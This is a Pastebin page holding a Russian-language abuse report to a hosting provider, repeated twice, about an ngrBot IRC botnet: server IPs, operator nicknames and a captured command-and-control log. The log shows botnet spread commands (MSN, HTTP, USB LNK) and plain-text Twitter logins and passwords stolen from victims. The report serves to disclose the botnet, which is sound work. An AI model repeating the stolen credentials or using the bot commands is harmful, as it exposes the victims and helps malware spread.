Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on Apr 25th, 2012  |  syntax: None  |  size: 7.54 KB  |  hits: 19  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Доброго времени суток,
  2.  
  3. На вашем, предположительно, выделенном
  4. сервере с IP-адресом:
  5. * Dns resolved secure1.serveriem.lv to 85.31.102.11 расположен BNC-сервер, с которого контролллируется крупный IRC-ботнет, расположенный на серверах:
  6. * Dns resolved irc1.eu.org to 91.194.77.98
  7. * Dns resolved irc.znc.lv to 91.194.77.115
  8.  
  9. Вирус удалось подцепить с одной из
  10. раздач на латвийском торрент-трекере
  11. filebase.ws - точную раздачу, увы, вспомнить не могу, поскольку инфицировался человек не разбирающийся в этих тонкостях.
  12. Так же хочу отметить что UnrealIRCD хитро собран для того, чтобы простой пользователь не смог обнаружить ботнет.
  13. Более того, эти сервера слинкованы с
  14. другой российской сетью. Владельцы
  15. ботнетов на скрытых каналах находится
  16. под ником: dekuevo
  17.  
  18. dekuevo H ~dk@secure1.serveriem.lv :2 Deniss Van De Man
  19.  
  20. Одного из них предположительно зовут
  21. Дмитрий.
  22. Лог-файл ниже (просмотрел активность
  23. .exe процесса):
  24.  
  25. Remote Host Port Number
  26. 213.251.170.52 80
  27. 91.194.77.98 6667 PASS ngrBot
  28.  
  29. PRIVMSG #ng# :[HTTP]: Updated HTTP spread message to "visithttp://goo.gl/o269r"
  30. NICK n{US|XPa}kffoslr
  31. USER kffoslr 0 0 :kffoslr
  32. JOIN #ng# ngrBot
  33. PRIVMSG #ng# :[MSN]: Updated MSN spread interval to "3"
  34. PRIVMSG #ng# :[HTTP]: Updated HTTP spread interval to "3"
  35. PRIVMSG #ng# :[MSN]: Updated MSN spread message to "Visithttp://goo.gl/o269r |"
  36.  
  37. Session Start: Mon Apr 07 21:13:59 2012
  38. [9:16] (n{MX|W7-32a}qpbthmj) Chrome ->http://twitter.com/ -> kryz_kryz
  39. : tamaki16
  40. [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryz_kryz : tamaki16 [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/settings/account -> kryzz_160993@hotmail.com :
  41. marina
  42. [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryzz_codebreaker : tamaki16 [9:16] ({SE|W7-32a}rljneaf) Chrome ->http://twitter.com/ -> inese.77@inbox.lv : tomassr4 [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryzz_breaker : marina [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/neeldelazaroK -> kryzz_breaker : marina [9:16] (n{ID|W7-32u}ewxsrbe) Chrome ->http://twitter.com/ -> Anaslol28@yahoo.com : 4nt1v1rus [9:16] (n{BR|W7-64u}ucigrit) Chrome -> https://twitter.com/ -> Paulo_Marks : 2010eva2011 [9:16] (n{MX|W7-32a}qpbthmj) Chrome ->http://twitter.com/intent/session
  43. -> kryz_kryz : tamaki16
  44. [9:34] @(dekuevo) .usb on
  45. [9:34] ({DE|W7-64a}mkliata) Updated a previous USB LNK spread on: G:
  46. with a newer file: 557DD93CA3D70B4DD6905EEC14C871DD.
  47. [9:34] ({ES|W7-32u}mivhcdx) Updated a previous USB LNK spread on: H:
  48. with a newer file: 0F1566CE70933357A09D0BE60575F313.
  49. [9:34] (n{FR|W7-64u}yykzyxo) Completed USB LNK spread on: I: with 6 folders.
  50. [9:34] (n{AR|VI-32u}lsomlcr) Completed USB LNK spread on: D: with 11 folders.
  51. [9:34] @(znc) сча ёбнем
  52. [9:35] ({BR|W7-64u}pblumuz) Completed USB LNK spread on: F: with 49 folders.
  53. [9:55] @(znc) надо ещё одну впску взять в германии [9:55] @(dekuevo) блядь [9:56] (n{BR|W7-32u}hvxvgpj) Executed:
  54. 'C:Usersnot-saudeAppDataRoamingbhmmcr.exe', Type: Native, Size: 174592 bytes.
  55.  
  56. После чего меня забанили:
  57. [9:58] Error from Server [Closing Link: user111[81.198.74.11] (User is permanently banned (suka)]
  58.  
  59. Убедительная просьба принять меры!wtf:/tmp# wtf:~# cat eQ1fh0LC.raw
  60. Доброго времени суток,
  61.  
  62. На вашем, предположительно, выделенном
  63. сервере с IP-адресом:
  64. * Dns resolved secure1.serveriem.lv to 85.31.102.11 расположен BNC-сервер, с которого контролллируется крупный IRC-ботнет, расположенный на серверах:
  65. * Dns resolved irc1.eu.org to 91.194.77.98
  66. * Dns resolved irc.znc.lv to 91.194.77.115
  67.  
  68. Вирус удалось подцепить с одной из
  69. раздач на латвийском торрент-трекере
  70. filebase.ws - точную раздачу, увы, вспомнить не могу, поскольку инфицировался человек не разбирающийся в этих тонкостях.
  71. Так же хочу отметить что UnrealIRCD хитро собран для того, чтобы простой пользователь не смог обнаружить ботнет.
  72. Более того, эти сервера слинкованы с
  73. другой российской сетью. Владельцы
  74. ботнетов на скрытых каналах находится
  75. под ником: dekuevo
  76.  
  77. dekuevo H ~dk@secure1.serveriem.lv :2 Deniss Van De Man
  78.  
  79. Одного из них предположительно зовут
  80. Дмитрий.
  81. Лог-файл ниже (просмотрел активность
  82. .exe процесса):
  83.  
  84. Remote Host Port Number
  85. 213.251.170.52 80
  86. 91.194.77.98 6667 PASS ngrBot
  87.  
  88. PRIVMSG #ng# :[HTTP]: Updated HTTP spread message to "visithttp://goo.gl/o269r"
  89. NICK n{US|XPa}kffoslr
  90. USER kffoslr 0 0 :kffoslr
  91. JOIN #ng# ngrBot
  92. PRIVMSG #ng# :[MSN]: Updated MSN spread interval to "3"
  93. PRIVMSG #ng# :[HTTP]: Updated HTTP spread interval to "3"
  94. PRIVMSG #ng# :[MSN]: Updated MSN spread message to "Visithttp://goo.gl/o269r |"
  95.  
  96. Session Start: Mon Apr 07 21:13:59 2012
  97. [9:16] (n{MX|W7-32a}qpbthmj) Chrome ->http://twitter.com/ -> kryz_kryz
  98. : tamaki16
  99. [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryz_kryz : tamaki16 [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/settings/account -> kryzz_160993@hotmail.com :
  100. marina
  101. [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryzz_codebreaker : tamaki16 [9:16] ({SE|W7-32a}rljneaf) Chrome ->http://twitter.com/ -> inese.77@inbox.lv : tomassr4 [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/ -> kryzz_breaker : marina [9:16] (n{MX|W7-32a}qpbthmj) Chrome -> https://twitter.com/neeldelazaroK -> kryzz_breaker : marina [9:16] (n{ID|W7-32u}ewxsrbe) Chrome ->http://twitter.com/ -> Anaslol28@yahoo.com : 4nt1v1rus [9:16] (n{BR|W7-64u}ucigrit) Chrome -> https://twitter.com/ -> Paulo_Marks : 2010eva2011 [9:16] (n{MX|W7-32a}qpbthmj) Chrome ->http://twitter.com/intent/session
  102. -> kryz_kryz : tamaki16
  103. [9:34] @(dekuevo) .usb on
  104. [9:34] ({DE|W7-64a}mkliata) Updated a previous USB LNK spread on: G:
  105. with a newer file: 557DD93CA3D70B4DD6905EEC14C871DD.
  106. [9:34] ({ES|W7-32u}mivhcdx) Updated a previous USB LNK spread on: H:
  107. with a newer file: 0F1566CE70933357A09D0BE60575F313.
  108. [9:34] (n{FR|W7-64u}yykzyxo) Completed USB LNK spread on: I: with 6 folders.
  109. [9:34] (n{AR|VI-32u}lsomlcr) Completed USB LNK spread on: D: with 11 folders.
  110. [9:34] @(znc) сча ёбнем
  111. [9:35] ({BR|W7-64u}pblumuz) Completed USB LNK spread on: F: with 49 folders.
  112. [9:55] @(znc) надо ещё одну впску взять в германии [9:55] @(dekuevo) блядь [9:56] (n{BR|W7-32u}hvxvgpj) Executed:
  113. 'C:Usersnot-saudeAppDataRoamingbhmmcr.exe', Type: Native, Size: 174592 bytes.
  114.  
  115. После чего меня забанили:
  116. [9:58] Error from Server [Closing Link: user111[81.198.74.11] (User is permanently banned (suka)]
create a new version of this paste RAW Paste Data